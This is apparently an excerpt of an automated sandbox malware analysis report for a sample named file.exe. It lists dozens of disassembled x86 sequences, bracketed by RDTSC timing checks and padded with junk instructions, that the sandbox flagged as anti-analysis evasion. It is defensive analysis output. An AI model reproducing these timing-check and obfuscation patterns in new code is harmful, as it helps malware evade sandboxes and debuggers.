Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139C8C4 second address: 139C8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139C8CA second address: 139C8DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAF1CCF565Bh 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139CB67 second address: 139CB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139CB6B second address: 139CB84 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c jmp 00007FAF1CCF565Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139CCBC second address: 139CCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139CDFA second address: 139CE37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAF1CCF5663h 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 jc 00007FAF1CCF5656h 0x00000017 jmp 00007FAF1CCF565Eh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139CFC7 second address: 139CFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0CB5 second address: 13A0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push edx 0x0000000d jnc 00007FAF1CCF5656h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FAF1CCF5668h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 jmp 00007FAF1CCF5664h 0x00000028 pop ecx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0D00 second address: 13A0D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0D05 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FAF1CCF5661h 0x0000000f mov esi, dword ptr [ebp+122D2C35h] 0x00000015 push dword ptr [ebp+122D0131h] 0x0000001b jp 00007FAF1CCF5658h 0x00000021 push ebx 0x00000022 pop esi 0x00000023 call dword ptr [ebp+122D2758h] 0x00000029 pushad 0x0000002a cld 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D2EF4h], edx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 call 00007FAF1CCF5665h 0x0000003d mov ebx, dword ptr [ebp+122D29A1h] 0x00000043 pop ecx 0x00000044 push ebx 0x00000045 jmp 00007FAF1CCF5668h 0x0000004a pop esi 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D2A61h], eax 0x00000052 or dword ptr [ebp+122D3381h], ebx 0x00000058 mov esi, 0000003Ch 0x0000005d sub dword ptr [ebp+122D2EF4h], edx 0x00000063 jmp 00007FAF1CCF565Fh 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c jmp 00007FAF1CCF5668h 0x00000071 lodsw 0x00000073 mov dword ptr [ebp+122D1882h], edi 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d jmp 00007FAF1CCF5665h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 mov dword ptr [ebp+122D2EF4h], ebx 0x0000008c jp 00007FAF1CCF5657h 0x00000092 stc 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 jbe 00007FAF1CCF5658h 0x0000009c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0D62 second address: 13A0DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FAF1CBF1D46h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e and edi, dword ptr [ebp+122D2B15h] 0x00000014 mov dword ptr [ebp+122D2893h], ecx 0x0000001a popad 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, 6CEACAC0h 0x00000024 ja 00007FAF1CBF1D46h 0x0000002a popad 0x0000002b mov dword ptr [ebp+122D27B5h], eax 0x00000031 popad 0x00000032 call 00007FAF1CBF1D49h 0x00000037 jmp 00007FAF1CBF1D53h 0x0000003c push eax 0x0000003d jmp 00007FAF1CBF1D4Ch 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0DC6 second address: 13A0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5667h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0DE2 second address: 13A0DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0DE7 second address: 13A0DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0DED second address: 13A0DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0DFB second address: 13A0DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0E9F second address: 13A0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0EA3 second address: 13A0EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0F2E second address: 13A0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0F32 second address: 13A0FB6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FAF1CCF5664h 0x00000011 nop 0x00000012 add esi, dword ptr [ebp+122D27ADh] 0x00000018 mov edi, dword ptr [ebp+122D2A35h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FAF1CCF5658h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov edx, dword ptr [ebp+122D2C25h] 0x00000040 call 00007FAF1CCF5659h 0x00000045 jo 00007FAF1CCF5663h 0x0000004b jmp 00007FAF1CCF565Dh 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 jp 00007FAF1CCF5656h 0x00000059 pop eax 0x0000005a pop eax 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0FB6 second address: 13A0FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FAF1CBF1D4Eh 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jnc 00007FAF1CBF1D4Eh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0FE5 second address: 13A108D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF1CCF5669h 0x0000000b popad 0x0000000c pop eax 0x0000000d movsx ecx, cx 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FAF1CCF5658h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jl 00007FAF1CCF5659h 0x00000032 movsx edx, si 0x00000035 push 00000000h 0x00000037 add edx, 10B21B71h 0x0000003d or cx, 10D5h 0x00000042 push 00000003h 0x00000044 call 00007FAF1CCF5659h 0x00000049 pushad 0x0000004a jnp 00007FAF1CCF565Ch 0x00000050 push edi 0x00000051 pushad 0x00000052 popad 0x00000053 pop edi 0x00000054 popad 0x00000055 push eax 0x00000056 push edi 0x00000057 jmp 00007FAF1CCF5664h 0x0000005c pop edi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 pushad 0x00000062 jmp 00007FAF1CCF565Bh 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a pop eax 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A108D second address: 13A10C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jbe 00007FAF1CBF1D48h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A119C second address: 13A11A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A11A2 second address: 13A11A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A11A6 second address: 13A120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f call 00007FAF1CCF5665h 0x00000014 adc si, B097h 0x00000019 pop ecx 0x0000001a pop edx 0x0000001b sub dword ptr [ebp+122D183Ch], ecx 0x00000021 push 00000000h 0x00000023 cmc 0x00000024 add ecx, dword ptr [ebp+122D2901h] 0x0000002a call 00007FAF1CCF5659h 0x0000002f pushad 0x00000030 jmp 00007FAF1CCF565Dh 0x00000035 jne 00007FAF1CCF5658h 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 pop edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A120F second address: 13A123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jc 00007FAF1CBF1D6Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAF1CBF1D58h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A123B second address: 13A12BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FAF1CCF5669h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jp 00007FAF1CCF5662h 0x0000001b pop eax 0x0000001c jbe 00007FAF1CCF5659h 0x00000022 movsx edi, bx 0x00000025 push 00000003h 0x00000027 mov edx, dword ptr [ebp+122D2A15h] 0x0000002d push 00000000h 0x0000002f and esi, dword ptr [ebp+122D1C50h] 0x00000035 push 00000003h 0x00000037 adc dx, 7A0Ah 0x0000003c call 00007FAF1CCF5659h 0x00000041 push edx 0x00000042 jmp 00007FAF1CCF565Fh 0x00000047 pop edx 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FAF1CCF565Ah 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A12BE second address: 13A12FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CBF1D4Ch 0x00000008 jo 00007FAF1CBF1D46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jc 00007FAF1CBF1D5Ah 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007FAF1CBF1D50h 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jne 00007FAF1CBF1D48h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A12FB second address: 13A12FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A12FF second address: 13A1328 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF1CBF1D58h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138DF7E second address: 138DF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138DF82 second address: 138DF88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138DF88 second address: 138DFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CCF5668h 0x0000000d jmp 00007FAF1CCF565Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 138DFB3 second address: 138DFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF70E second address: 13BF713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF713 second address: 13BF71A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF71A second address: 13BF72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FAF1CCF5656h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF72B second address: 13BF73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF73B second address: 13BF741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF741 second address: 13BF757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF89D second address: 13BF8A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF8A1 second address: 13BF8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FAF1CBF1D52h 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAF1CBF1D52h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA27 second address: 13BFA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CCF5656h 0x0000000a jmp 00007FAF1CCF5660h 0x0000000f popad 0x00000010 push edi 0x00000011 js 00007FAF1CCF5656h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA4A second address: 13BFA54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA54 second address: 13BFA6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF1CCF5656h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FAF1CCF5656h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFE64 second address: 13BFE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFE6A second address: 13BFE7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FAF1CCF565Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0106 second address: 13C0110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FAF1CBF1D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0110 second address: 13C0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0116 second address: 13C0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF1CBF1D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0120 second address: 13C0132 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FAF1CCF5656h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0132 second address: 13C013C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CBF1D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C013C second address: 13C014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C014B second address: 13C014F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0295 second address: 13C029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C058A second address: 13C058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0880 second address: 13C088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C088A second address: 13C088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C088E second address: 13C08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5663h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1310 second address: 13C131B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C131B second address: 13C1320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C71BF second address: 13C71C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C71C8 second address: 13C71CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C71CC second address: 13C71D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C74A2 second address: 13C74A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C74A8 second address: 13C74AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C855E second address: 13C856A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C856A second address: 13C8570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBC64 second address: 13CBC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBC68 second address: 13CBC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBF56 second address: 13CBF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC08D second address: 13CC0B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAF1CBF1D4Bh 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC0B6 second address: 13CC0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC0C5 second address: 13CC0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC0CB second address: 13CC0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC692 second address: 13CC698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC698 second address: 13CC6A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007FAF1CCF5656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CC6A8 second address: 13CC6AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
